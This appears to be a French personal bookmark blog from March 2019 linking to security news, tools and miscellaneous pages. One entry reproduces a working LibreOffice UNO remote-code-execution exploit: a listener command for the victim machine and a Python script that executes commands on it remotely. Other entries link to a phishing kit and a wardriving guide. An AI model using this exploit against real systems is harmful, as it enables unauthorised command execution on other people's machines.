PROJET AUTOBLOG


shaarli-Links

Site original : shaarli-Links
⇐ retour index

Déploiement de la 5G : l'Allemagne victime collatérale du bras de fer opposant Huawei aux USA - Cyberguerre

vendredi 15 mars 2019 à 15:52
Alors, vous voulez la surveillance chinoise ou la surveillance américaine ?
Permalink

Source : https://cyberguerre.numerama.com/1087-deploiement-de-la-5g-lallemagne-victime-collaterale-du-bras-de-fer-opposant-huawei-aux-usa.html


Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution

vendredi 15 mars 2019 à 14:43
# Utilisation de LibreOffice comme backdoor.

# Sur le PC victime
# ouvrir un serveur d'écoute qui interprète les commandes qu'on lui envoit :
soffice --accept='socket,host=0.0.0.0,port=2002;urp;StarOffice.Service' --invisible

# Sur le PC de contrôle :
```
import uno
from com.sun.star.system import XSystemShellExecute
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('--host', help='host to connect to', dest='host', required=True)
parser.add_argument('--port', help='port to connect to', dest='port', required=True)

args = parser.parse_args()
# Define the UNO component
localContext = uno.getComponentContext()

# Define the resolver to use, this is used to connect with the API
resolver = localContext.ServiceManager.createInstanceWithContext(
"com.sun.star.bridge.UnoUrlResolver", localContext )

# Connect with the provided host on the provided target port
print("[+] Connecting to target...")
context = resolver.resolve(
"uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host,args.port))
   
# Issue the service manager to spawn the SystemShellExecute module and execute calc.exe
service_manager = context.ServiceManager
print("[+] Connected to {0}".format(args.host))
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute")
shell_execute.execute("firefox", 'http://exemple.com',1)
```
Permalink

Source : https://www.exploit-db.com/exploits/46544


Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers

vendredi 15 mars 2019 à 11:02
https://www.exploit-db.com/searchsploit
# exemple :
searchsploit sftp
Permalink

Source : https://www.exploit-db.com


Category:Metasploitable - charlesreid1

vendredi 15 mars 2019 à 10:16

Permalink

Source : https://charlesreid1.com/wiki/Category:Metasploitable


DARPA Is Building a $10 Million, Open Source, Secure Voting System - Motherboard

vendredi 15 mars 2019 à 09:44
à suivre
Permalink

Source : https://motherboard.vice.com/en_us/article/yw84q7/darpa-is-building-a-dollar10-million-open-source-secure-voting-system


GitHub - rapid7/metasploitable3: Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities.

jeudi 14 mars 2019 à 10:32

Permalink

Source : https://github.com/rapid7/metasploitable3


DEEP DARK & ACID TECHNO MIX 2018 | MAKE ACID GREAT AGAIN - YouTube

jeudi 14 mars 2019 à 09:56
via https://www.nothing-is-3d.com/links/?2uh_yw
Permalink

Source : https://www.youtube.com/watch?v=XUAAUALfTVA


GitHub - thelinuxchoice/blackeye: The most complete Phishing Tool, with 32 templates +1 customizable

jeudi 14 mars 2019 à 09:32
Quelqu'un a créé un outil de phishing qui copie 32 sites.
Permalink

Source : https://github.com/thelinuxchoice/blackeye


ArchiveBox – Un clone d’Archive.org à héberger vous-même – Korben

mercredi 13 mars 2019 à 17:17
https://github.com/pirate/ArchiveBox
https://github.com/pirate/ArchiveBox/wiki/Usage
https://archive.sweeting.me/
Permalink

Source : https://korben.info/archivebox-un-clone-darchive-org-et-de-la-wayback-machine-a-auto-heberger.html


Désabonnez-moi ! | ploum.net

mardi 12 mars 2019 à 14:35
Note :
«
Bonjour,

En vertu de la loi RGPD, pourriez-vous m’informer de la manière par laquelle vous avez obtenu mes coordonnées et effacer toutes données me concernant de vos différentes bases de données. Si vous les avez acquises, merci de me donner les coordonnées de votre fournisseur.

Bien à vous,
»

via https://sebsauvage.net/links/?kGupXg
Permalink

Source : https://ploum.net/desabonnez-moi/


ffmpeg, la boite à outils multimédia - Documentation - Wiki - Linuxtricks

dimanche 10 mars 2019 à 14:09
via http://abel.antunes.free.fr/shaarli/index.php5?wnjmEA
Permalink

Source : https://www.linuxtricks.fr/wiki/ffmpeg-la-boite-a-outils-multimedia


Extract Meta Data

samedi 9 mars 2019 à 20:22

Permalink

Source : https://citizenevidence.amnestyusa.org/


5G et espionnage : la loi taillée contre Huawei avance malgré les critiques - Politique - Numerama

vendredi 8 mars 2019 à 16:04
Donc on pourra enfin bannir le matériel américain ? (Microsoft, Cisco Systems, DELL, HP, IBM,...)
^_^

Permalink

Source : https://www.numerama.com/politique/469743-5g-et-espionnage-la-loi-taillee-contre-huawei-avance-malgre-les-critiques.html


Solo – SoloKeys

jeudi 7 mars 2019 à 11:33
https://shop.solokeys.com/collections/frontpage/products/solo
https://solokeys.com/fr/start/
https://github.com/solokeys/solo-hw
https://github.com/solokeys/solo

https://www.generation-nt.com/connexion-sans-mot-passe-webauthn-w3c-standard-web-actualite-1962765.html
Permalink

Source : https://shop.solokeys.com/


Ghidra

jeudi 7 mars 2019 à 10:32
«A software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the Cybersecurity mission»

via https://pentesttools.net/nsa-releases-ghidra-9-0-free-powerful-reverse-engineering-tool/
Permalink

Source : https://www.ghidra-sre.org/


Web-Authentication · GitHub

mercredi 6 mars 2019 à 14:30
à étudier
https://www.generation-nt.com/connexion-sans-mot-passe-webauthn-w3c-standard-web-actualite-1962765.html
https://github.com/web-auth
https://webauthn.spomky-labs.com/
https://www.w3.org/TR/webauthn/
Permalink

Source : https://github.com/web-auth


Wardriving with Kismet, GPS and Google Earth. – Stealing the Network

mercredi 6 mars 2019 à 12:08
GPS : GlobalSat BU-353-S4 receiver
Permalink

Source : https://stealingthe.network/wardriving-with-kismet-gps-and-google-earth/


Note: wifi on/off

mardi 5 mars 2019 à 22:04
# on
modprobe cfg80211
modprobe brcmutil
modprobe brcmfmac

# off
/sbin/ifconfig wlan0 down
/bin/systemctl stop bluetooth
/bin/systemctl stop hciuart
rmmod brcmfmac
rmmod brcmutil
rmmod cfg80211

# cat /etc/modprobe.d/wifi-blacklist.conf
blacklist brcmfmac
blacklist brcmutil
blacklist cfg80211
blacklist rfkill
blacklist bnep
blacklist hci_uart
blacklist btbcm
blacklist bluetooth
Permalink

Source : https://www.ecirtam.net/links/?noVcBg


SPOILER alert, literally: Intel CPUs afflicted with simple data-spewing spec-exec vulnerability • The Register

mardi 5 mars 2019 à 15:00
https://arxiv.org/pdf/1903.00446.pdf
Permalink

Source : https://www.theregister.co.uk/2019/03/05/spoiler_intel_flaw/


⚡️ LA MALÉDICTION DE BROCÉLIANDE racontée aux enfants - Feat Rendez-vous contes - 2/2 - YouTube - Le Hollandais Volant

mardi 5 mars 2019 à 14:17
N'hésites pas à venir nous voir en Bretagne.
On peut t’héberger si besoin :-)
Permalink

Source : https://lehollandaisvolant.net/?id=20190305122820